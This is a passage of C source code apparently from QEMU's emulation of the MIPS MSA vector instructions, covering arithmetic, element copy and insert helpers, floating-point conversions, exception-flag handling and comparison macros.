pws->h[2], pwt->h[2]); \ pwd->h[3] = msa_ ## func ## _df(df, pws->h[3], pwt->h[3]); \ pwd->h[4] = msa_ ## func ## _df(df, pws->h[4], pwt->h[4]); \ pwd->h[5] = msa_ ## func ## _df(df, pws->h[5], pwt->h[5]); \ pwd->h[6] = msa_ ## func ## _df(df, pws->h[6], pwt->h[6]); \ pwd->h[7] = msa_ ## func ## _df(df, pws->h[7], pwt->h[7]); \ break; \ case DF_WORD: \ pwd->w[0] = msa_ ## func ## _df(df, pws->w[0], pwt->w[0]); \ pwd->w[1] = msa_ ## func ## _df(df, pws->w[1], pwt->w[1]); \ pwd->w[2] = msa_ ## func ## _df(df, pws->w[2], pwt->w[2]); \ pwd->w[3] = msa_ ## func ## _df(df, pws->w[3], pwt->w[3]); \ break; \ case DF_DOUBLE: \ pwd->d[0] = msa_ ## func ## _df(df, pws->d[0], pwt->d[0]); \ pwd->d[1] = msa_ ## func ## _df(df, pws->d[1], pwt->d[1]); \ break; \ default: \ assert(0); \ } \ } MSA_BINOP_DF(subv) MSA_BINOP_DF(subs_s) MSA_BINOP_DF(subs_u) MSA_BINOP_DF(subsus_u) MSA_BINOP_DF(subsuu_s) MSA_BINOP_DF(mulv) MSA_BINOP_DF(dotp_s) MSA_BINOP_DF(dotp_u) MSA_BINOP_DF(mul_q) MSA_BINOP_DF(mulr_q) #undef MSA_BINOP_DF void helper_msa_sld_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t rt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_sld_df(df, pwd, pws, env->active_tc.gpr[rt]); } static inline int64_t msa_maddv_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { return dest + arg1 * arg2; } static inline int64_t msa_msubv_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { return dest - arg1 * arg2; } static inline int64_t msa_dpadd_s_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dpadd_u_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest + (even_arg1 * even_arg2) + (odd_arg1 * odd_arg2); } static inline int64_t msa_dpsub_s_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; SIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); SIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); } static inline int64_t msa_dpsub_u_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t even_arg1; int64_t even_arg2; int64_t odd_arg1; int64_t odd_arg2; UNSIGNED_EXTRACT(even_arg1, odd_arg1, arg1, df); UNSIGNED_EXTRACT(even_arg2, odd_arg2, arg2, df); return dest - ((even_arg1 * even_arg2) + (odd_arg1 * odd_arg2)); } static inline int64_t msa_madd_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } static inline int64_t msa_msub_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } static inline int64_t msa_maddr_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) + q_prod + r_bit) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } static inline int64_t msa_msubr_q_df(uint32_t df, int64_t dest, int64_t arg1, int64_t arg2) { int64_t q_prod, q_ret; int64_t q_max = DF_MAX_INT(df); int64_t q_min = DF_MIN_INT(df); int64_t r_bit = 1ULL << (DF_BITS(df) - 2); q_prod = arg1 * arg2; q_ret = ((dest << (DF_BITS(df) - 1)) - q_prod + r_bit) >> (DF_BITS(df) - 1); return (q_ret < q_min) ? q_min : (q_max < q_ret) ? q_max : q_ret; } #define MSA_TEROP_DF(func) \ void helper_msa_ ## func ## _df(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ \ switch (df) { \ case DF_BYTE: \ pwd->b[0] = msa_ ## func ## _df(df, pwd->b[0], pws->b[0], \ pwt->b[0]); \ pwd->b[1] = msa_ ## func ## _df(df, pwd->b[1], pws->b[1], \ pwt->b[1]); \ pwd->b[2] = msa_ ## func ## _df(df, pwd->b[2], pws->b[2], \ pwt->b[2]); \ pwd->b[3] = msa_ ## func ## _df(df, pwd->b[3], pws->b[3], \ pwt->b[3]); \ pwd->b[4] = msa_ ## func ## _df(df, pwd->b[4], pws->b[4], \ pwt->b[4]); \ pwd->b[5] = msa_ ## func ## _df(df, pwd->b[5], pws->b[5], \ pwt->b[5]); \ pwd->b[6] = msa_ ## func ## _df(df, pwd->b[6], pws->b[6], \ pwt->b[6]); \ pwd->b[7] = msa_ ## func ## _df(df, pwd->b[7], pws->b[7], \ pwt->b[7]); \ pwd->b[8] = msa_ ## func ## _df(df, pwd->b[8], pws->b[8], \ pwt->b[8]); \ pwd->b[9] = msa_ ## func ## _df(df, pwd->b[9], pws->b[9], \ pwt->b[9]); \ pwd->b[10] = msa_ ## func ## _df(df, pwd->b[10], pws->b[10], \ pwt->b[10]); \ pwd->b[11] = msa_ ## func ## _df(df, pwd->b[11], pws->b[11], \ pwt->b[11]); \ pwd->b[12] = msa_ ## func ## _df(df, pwd->b[12], pws->b[12], \ pwt->b[12]); \ pwd->b[13] = msa_ ## func ## _df(df, pwd->b[13], pws->b[13], \ pwt->b[13]); \ pwd->b[14] = msa_ ## func ## _df(df, pwd->b[14], pws->b[14], \ pwt->b[14]); \ pwd->b[15] = msa_ ## func ## _df(df, pwd->b[15], pws->b[15], \ pwt->b[15]); \ break; \ case DF_HALF: \ pwd->h[0] = msa_ ## func ## _df(df, pwd->h[0], pws->h[0], pwt->h[0]); \ pwd->h[1] = msa_ ## func ## _df(df, pwd->h[1], pws->h[1], pwt->h[1]); \ pwd->h[2] = msa_ ## func ## _df(df, pwd->h[2], pws->h[2], pwt->h[2]); \ pwd->h[3] = msa_ ## func ## _df(df, pwd->h[3], pws->h[3], pwt->h[3]); \ pwd->h[4] = msa_ ## func ## _df(df, pwd->h[4], pws->h[4], pwt->h[4]); \ pwd->h[5] = msa_ ## func ## _df(df, pwd->h[5], pws->h[5], pwt->h[5]); \ pwd->h[6] = msa_ ## func ## _df(df, pwd->h[6], pws->h[6], pwt->h[6]); \ pwd->h[7] = msa_ ## func ## _df(df, pwd->h[7], pws->h[7], pwt->h[7]); \ break; \ case DF_WORD: \ pwd->w[0] = msa_ ## func ## _df(df, pwd->w[0], pws->w[0], pwt->w[0]); \ pwd->w[1] = msa_ ## func ## _df(df, pwd->w[1], pws->w[1], pwt->w[1]); \ pwd->w[2] = msa_ ## func ## _df(df, pwd->w[2], pws->w[2], pwt->w[2]); \ pwd->w[3] = msa_ ## func ## _df(df, pwd->w[3], pws->w[3], pwt->w[3]); \ break; \ case DF_DOUBLE: \ pwd->d[0] = msa_ ## func ## _df(df, pwd->d[0], pws->d[0], pwt->d[0]); \ pwd->d[1] = msa_ ## func ## _df(df, pwd->d[1], pws->d[1], pwt->d[1]); \ break; \ default: \ assert(0); \ } \ } MSA_TEROP_DF(maddv) MSA_TEROP_DF(msubv) MSA_TEROP_DF(dpadd_s) MSA_TEROP_DF(dpadd_u) MSA_TEROP_DF(dpsub_s) MSA_TEROP_DF(dpsub_u) MSA_TEROP_DF(binsl) MSA_TEROP_DF(binsr) MSA_TEROP_DF(madd_q) MSA_TEROP_DF(msub_q) MSA_TEROP_DF(maddr_q) MSA_TEROP_DF(msubr_q) #undef MSA_TEROP_DF static inline void msa_splat_df(uint32_t df, wr_t *pwd, wr_t *pws, target_ulong rt) { uint32_t n = rt % DF_ELEMENTS(df); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = pws->b[n]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = pws->h[n]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = pws->w[n]; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = pws->d[n]; } break; default: assert(0); } } void helper_msa_splat_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t rt) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_splat_df(df, pwd, pws, env->active_tc.gpr[rt]); } #define MSA_DO_B MSA_DO(b) #define MSA_DO_H MSA_DO(h) #define MSA_DO_W MSA_DO(w) #define MSA_DO_D MSA_DO(d) #define MSA_LOOP_B MSA_LOOP(B) #define MSA_LOOP_H MSA_LOOP(H) #define MSA_LOOP_W MSA_LOOP(W) #define MSA_LOOP_D MSA_LOOP(D) #define MSA_LOOP_COND_B MSA_LOOP_COND(DF_BYTE) #define MSA_LOOP_COND_H MSA_LOOP_COND(DF_HALF) #define MSA_LOOP_COND_W MSA_LOOP_COND(DF_WORD) #define MSA_LOOP_COND_D MSA_LOOP_COND(DF_DOUBLE) #define MSA_LOOP(DF) \ do { \ for (i = 0; i < (MSA_LOOP_COND_ ## DF) ; i++) { \ MSA_DO_ ## DF; \ } \ } while (0) #define MSA_FN_DF(FUNC) \ void helper_msa_##FUNC(CPUMIPSState *env, uint32_t df, uint32_t wd, \ uint32_t ws, uint32_t wt) \ { \ wr_t *pwd = &(env->active_fpu.fpr[wd].wr); \ wr_t *pws = &(env->active_fpu.fpr[ws].wr); \ wr_t *pwt = &(env->active_fpu.fpr[wt].wr); \ wr_t wx, *pwx = &wx; \ uint32_t i; \ switch (df) { \ case DF_BYTE: \ MSA_LOOP_B; \ break; \ case DF_HALF: \ MSA_LOOP_H; \ break; \ case DF_WORD: \ MSA_LOOP_W; \ break; \ case DF_DOUBLE: \ MSA_LOOP_D; \ break; \ default: \ assert(0); \ } \ msa_move_v(pwd, pwx); \ } #define MSA_LOOP_COND(DF) \ (DF_ELEMENTS(DF) / 2) #define Rb(pwr, i) (pwr->b[i]) #define Lb(pwr, i) (pwr->b[i + DF_ELEMENTS(DF_BYTE) / 2]) #define Rh(pwr, i) (pwr->h[i]) #define Lh(pwr, i) (pwr->h[i + DF_ELEMENTS(DF_HALF) / 2]) #define Rw(pwr, i) (pwr->w[i]) #define Lw(pwr, i) (pwr->w[i + DF_ELEMENTS(DF_WORD) / 2]) #define Rd(pwr, i) (pwr->d[i]) #define Ld(pwr, i) (pwr->d[i + DF_ELEMENTS(DF_DOUBLE) / 2]) #undef MSA_LOOP_COND #define MSA_LOOP_COND(DF) \ (DF_ELEMENTS(DF)) #define MSA_DO(DF) \ do { \ uint32_t n = DF_ELEMENTS(df); \ uint32_t k = (pwd->DF[i] & 0x3f) % (2 * n); \ pwx->DF[i] = \ (pwd->DF[i] & 0xc0) ? 0 : k < n ? pwt->DF[k] : pws->DF[k - n]; \ } while (0) MSA_FN_DF(vshf_df) #undef MSA_DO #undef MSA_LOOP_COND #undef MSA_FN_DF void helper_msa_sldi_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_sld_df(df, pwd, pws, n); } void helper_msa_splati_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); msa_splat_df(df, pwd, pws, n); } void helper_msa_copy_s_b(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif env->active_tc.gpr[rd] = (int8_t)env->active_fpu.fpr[ws].wr.b[n]; } void helper_msa_copy_s_h(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif env->active_tc.gpr[rd] = (int16_t)env->active_fpu.fpr[ws].wr.h[n]; } void helper_msa_copy_s_w(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif env->active_tc.gpr[rd] = (int32_t)env->active_fpu.fpr[ws].wr.w[n]; } void helper_msa_copy_s_d(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 2; env->active_tc.gpr[rd] = (int64_t)env->active_fpu.fpr[ws].wr.d[n]; } void helper_msa_copy_u_b(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif env->active_tc.gpr[rd] = (uint8_t)env->active_fpu.fpr[ws].wr.b[n]; } void helper_msa_copy_u_h(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif env->active_tc.gpr[rd] = (uint16_t)env->active_fpu.fpr[ws].wr.h[n]; } void helper_msa_copy_u_w(CPUMIPSState *env, uint32_t rd, uint32_t ws, uint32_t n) { n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif env->active_tc.gpr[rd] = (uint32_t)env->active_fpu.fpr[ws].wr.w[n]; } void helper_msa_insert_b(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 16; #if defined(HOST_WORDS_BIGENDIAN) if (n < 8) { n = 8 - n - 1; } else { n = 24 - n - 1; } #endif pwd->b[n] = (int8_t)rs; } void helper_msa_insert_h(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 8; #if defined(HOST_WORDS_BIGENDIAN) if (n < 4) { n = 4 - n - 1; } else { n = 12 - n - 1; } #endif pwd->h[n] = (int16_t)rs; } void helper_msa_insert_w(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 4; #if defined(HOST_WORDS_BIGENDIAN) if (n < 2) { n = 2 - n - 1; } else { n = 6 - n - 1; } #endif pwd->w[n] = (int32_t)rs; } void helper_msa_insert_d(CPUMIPSState *env, uint32_t wd, uint32_t rs_num, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); target_ulong rs = env->active_tc.gpr[rs_num]; n %= 2; pwd->d[n] = (int64_t)rs; } void helper_msa_insve_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t ws, uint32_t n) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); wr_t *pws = &(env->active_fpu.fpr[ws].wr); switch (df) { case DF_BYTE: pwd->b[n] = (int8_t)pws->b[0]; break; case DF_HALF: pwd->h[n] = (int16_t)pws->h[0]; break; case DF_WORD: pwd->w[n] = (int32_t)pws->w[0]; break; case DF_DOUBLE: pwd->d[n] = (int64_t)pws->d[0]; break; default: assert(0); } } void helper_msa_ctcmsa(CPUMIPSState *env, target_ulong elm, uint32_t cd) { switch (cd) { case 0: break; case 1: env->active_tc.msacsr = (int32_t)elm & MSACSR_MASK; restore_msa_fp_status(env); /* check exception */ if ((GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED) & GET_FP_CAUSE(env->active_tc.msacsr)) { do_raise_exception(env, EXCP_MSAFPE, GETPC()); } break; } } target_ulong helper_msa_cfcmsa(CPUMIPSState *env, uint32_t cs) { switch (cs) { case 0: return env->msair; case 1: return env->active_tc.msacsr & MSACSR_MASK; } return 0; } void helper_msa_fill_df(CPUMIPSState *env, uint32_t df, uint32_t wd, uint32_t rs) { wr_t *pwd = &(env->active_fpu.fpr[wd].wr); uint32_t i; switch (df) { case DF_BYTE: for (i = 0; i < DF_ELEMENTS(DF_BYTE); i++) { pwd->b[i] = (int8_t)env->active_tc.gpr[rs]; } break; case DF_HALF: for (i = 0; i < DF_ELEMENTS(DF_HALF); i++) { pwd->h[i] = (int16_t)env->active_tc.gpr[rs]; } break; case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { pwd->w[i] = (int32_t)env->active_tc.gpr[rs]; } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { pwd->d[i] = (int64_t)env->active_tc.gpr[rs]; } break; default: assert(0); } } #define FLOAT_ONE32 make_float32(0x3f8 << 20) #define FLOAT_ONE64 make_float64(0x3ffULL << 52) #define FLOAT_SNAN16(s) (float16_default_nan(s) ^ 0x0220) /* 0x7c20 */ #define FLOAT_SNAN32(s) (float32_default_nan(s) ^ 0x00400020) /* 0x7f800020 */ #define FLOAT_SNAN64(s) (float64_default_nan(s) ^ 0x0008000000000020ULL) /* 0x7ff0000000000020 */ static inline void clear_msacsr_cause(CPUMIPSState *env) { SET_FP_CAUSE(env->active_tc.msacsr, 0); } static inline void check_msacsr_cause(CPUMIPSState *env, uintptr_t retaddr) { if ((GET_FP_CAUSE(env->active_tc.msacsr) & (GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED)) == 0) { UPDATE_FP_FLAGS(env->active_tc.msacsr, GET_FP_CAUSE(env->active_tc.msacsr)); } else { do_raise_exception(env, EXCP_MSAFPE, retaddr); } } /* Flush-to-zero use cases for update_msacsr() */ #define CLEAR_FS_UNDERFLOW 1 #define CLEAR_IS_INEXACT 2 #define RECIPROCAL_INEXACT 4 static inline int update_msacsr(CPUMIPSState *env, int action, int denormal) { int ieee_ex; int c; int cause; int enable; ieee_ex = get_float_exception_flags(&env->active_tc.msa_fp_status); /* QEMU softfloat does not signal all underflow cases */ if (denormal) { ieee_ex |= float_flag_underflow; } c = ieee_ex_to_mips(ieee_ex); enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; /* Set Inexact (I) when flushing inputs to zero */ if ((ieee_ex & float_flag_input_denormal) && (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { if (action & CLEAR_IS_INEXACT) { c &= ~FP_INEXACT; } else { c |= FP_INEXACT; } } /* Set Inexact (I) and Underflow (U) when flushing outputs to zero */ if ((ieee_ex & float_flag_output_denormal) && (env->active_tc.msacsr & MSACSR_FS_MASK) != 0) { c |= FP_INEXACT; if (action & CLEAR_FS_UNDERFLOW) { c &= ~FP_UNDERFLOW; } else { c |= FP_UNDERFLOW; } } /* Set Inexact (I) when Overflow (O) is not enabled */ if ((c & FP_OVERFLOW) != 0 && (enable & FP_OVERFLOW) == 0) { c |= FP_INEXACT; } /* Clear Exact Underflow when Underflow (U) is not enabled */ if ((c & FP_UNDERFLOW) != 0 && (enable & FP_UNDERFLOW) == 0 && (c & FP_INEXACT) == 0) { c &= ~FP_UNDERFLOW; } /* * Reciprocal operations set only Inexact when valid and not * divide by zero */ if ((action & RECIPROCAL_INEXACT) && (c & (FP_INVALID | FP_DIV0)) == 0) { c = FP_INEXACT; } cause = c & enable; /* all current enabled exceptions */ if (cause == 0) { /* * No enabled exception, update the MSACSR Cause * with all current exceptions */ SET_FP_CAUSE(env->active_tc.msacsr, (GET_FP_CAUSE(env->active_tc.msacsr) | c)); } else { /* Current exceptions are enabled */ if ((env->active_tc.msacsr & MSACSR_NX_MASK) == 0) { /* * Exception(s) will trap, update MSACSR Cause * with all enabled exceptions */ SET_FP_CAUSE(env->active_tc.msacsr, (GET_FP_CAUSE(env->active_tc.msacsr) | c)); } } return c; } static inline int get_enabled_exceptions(const CPUMIPSState *env, int c) { int enable = GET_FP_ENABLE(env->active_tc.msacsr) | FP_UNIMPLEMENTED; return c & enable; } static inline float16 float16_from_float32(int32_t a, flag ieee, float_status *status) { float16 f_val; f_val = float32_to_float16((float32)a, ieee, status); return a < 0 ? (f_val | (1 << 15)) : f_val; } static inline float32 float32_from_float64(int64_t a, float_status *status) { float32 f_val; f_val = float64_to_float32((float64)a, status); return a < 0 ? (f_val | (1 << 31)) : f_val; } static inline float32 float32_from_float16(int16_t a, flag ieee, float_status *status) { float32 f_val; f_val = float16_to_float32((float16)a, ieee, status); return a < 0 ? (f_val | (1 << 31)) : f_val; } static inline float64 float64_from_float32(int32_t a, float_status *status) { float64 f_val; f_val = float32_to_float64((float64)a, status); return a < 0 ? (f_val | (1ULL << 63)) : f_val; } static inline float32 float32_from_q16(int16_t a, float_status *status) { float32 f_val; /* conversion as integer and scaling */ f_val = int32_to_float32(a, status); f_val = float32_scalbn(f_val, -15, status); return f_val; } static inline float64 float64_from_q32(int32_t a, float_status *status) { float64 f_val; /* conversion as integer and scaling */ f_val = int32_to_float64(a, status); f_val = float64_scalbn(f_val, -31, status); return f_val; } static inline int16_t float32_to_q16(float32 a, float_status *status) { int32_t q_val; int32_t q_min = 0xffff8000; int32_t q_max = 0x00007fff; int ieee_ex; if (float32_is_any_nan(a)) { float_raise(float_flag_invalid, status); return 0; } /* scaling */ a = float32_scalbn(a, 15, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_overflow) { float_raise(float_flag_inexact, status); return (int32_t)a < 0 ? q_min : q_max; } /* conversion to int */ q_val = float32_to_int32(a, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_invalid) { set_float_exception_flags(ieee_ex & (~float_flag_invalid) , status); float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)a < 0 ? q_min : q_max; } if (q_val < q_min) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int16_t)q_min; } if (q_max < q_val) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int16_t)q_max; } return (int16_t)q_val; } static inline int32_t float64_to_q32(float64 a, float_status *status) { int64_t q_val; int64_t q_min = 0xffffffff80000000LL; int64_t q_max = 0x000000007fffffffLL; int ieee_ex; if (float64_is_any_nan(a)) { float_raise(float_flag_invalid, status); return 0; } /* scaling */ a = float64_scalbn(a, 31, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_overflow) { float_raise(float_flag_inexact, status); return (int64_t)a < 0 ? q_min : q_max; } /* conversion to integer */ q_val = float64_to_int64(a, status); ieee_ex = get_float_exception_flags(status); set_float_exception_flags(ieee_ex & (~float_flag_underflow) , status); if (ieee_ex & float_flag_invalid) { set_float_exception_flags(ieee_ex & (~float_flag_invalid) , status); float_raise(float_flag_overflow | float_flag_inexact, status); return (int64_t)a < 0 ? q_min : q_max; } if (q_val < q_min) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)q_min; } if (q_max < q_val) { float_raise(float_flag_overflow | float_flag_inexact, status); return (int32_t)q_max; } return (int32_t)q_val; } #define MSA_FLOAT_COND(DEST, OP, ARG1, ARG2, BITS, QUIET) \ do { \ float_status *status = &env->active_tc.msa_fp_status; \ int c; \ int64_t cond; \ set_float_exception_flags(0, status); \ if (!QUIET) { \ cond = float ## BITS ## _ ## OP(ARG1, ARG2, status); \ } else { \ cond = float ## BITS ## _ ## OP ## _quiet(ARG1, ARG2, status); \ } \ DEST = cond ? M_MAX_UINT(BITS) : 0; \ c = update_msacsr(env, CLEAR_IS_INEXACT, 0); \ \ if (get_enabled_exceptions(env, c)) { \ DEST = ((FLOAT_SNAN ## BITS(status) >> 6) << 6) | c; \ } \ } while (0) #define MSA_FLOAT_AF(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ if ((DEST & M_MAX_UINT(BITS)) == M_MAX_UINT(BITS)) { \ DEST = 0; \ } \ } while (0) #define MSA_FLOAT_UEQ(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, eq, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_NE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_UNE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG2, ARG1, BITS, QUIET); \ } \ } \ } while (0) #define MSA_FLOAT_ULE(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_ULT(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, unordered, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, lt, ARG1, ARG2, BITS, QUIET); \ } \ } while (0) #define MSA_FLOAT_OR(DEST, ARG1, ARG2, BITS, QUIET) \ do { \ MSA_FLOAT_COND(DEST, le, ARG1, ARG2, BITS, QUIET); \ if (DEST == 0) { \ MSA_FLOAT_COND(DEST, le, ARG2, ARG1, BITS, QUIET); \ } \ } while (0) static inline void compare_af(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_AF(pwx->w[i], pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_AF(pwx->d[i], pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_un(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], unordered, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], unordered, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_eq(CPUMIPSState *env, wr_t *pwd, wr_t *pws, wr_t *pwt, uint32_t df, int quiet, uintptr_t retaddr) { wr_t wx, *pwx = &wx; uint32_t i; clear_msacsr_cause(env); switch (df) { case DF_WORD: for (i = 0; i < DF_ELEMENTS(DF_WORD); i++) { MSA_FLOAT_COND(pwx->w[i], eq, pws->w[i], pwt->w[i], 32, quiet); } break; case DF_DOUBLE: for (i = 0; i < DF_ELEMENTS(DF_DOUBLE); i++) { MSA_FLOAT_COND(pwx->d[i], eq, pws->d[i], pwt->d[i], 64, quiet); } break; default: assert(0); } check_msacsr_cause(env, retaddr); msa_move_v(pwd, pwx); } static inline void compare_ueq(CPUMIPSState 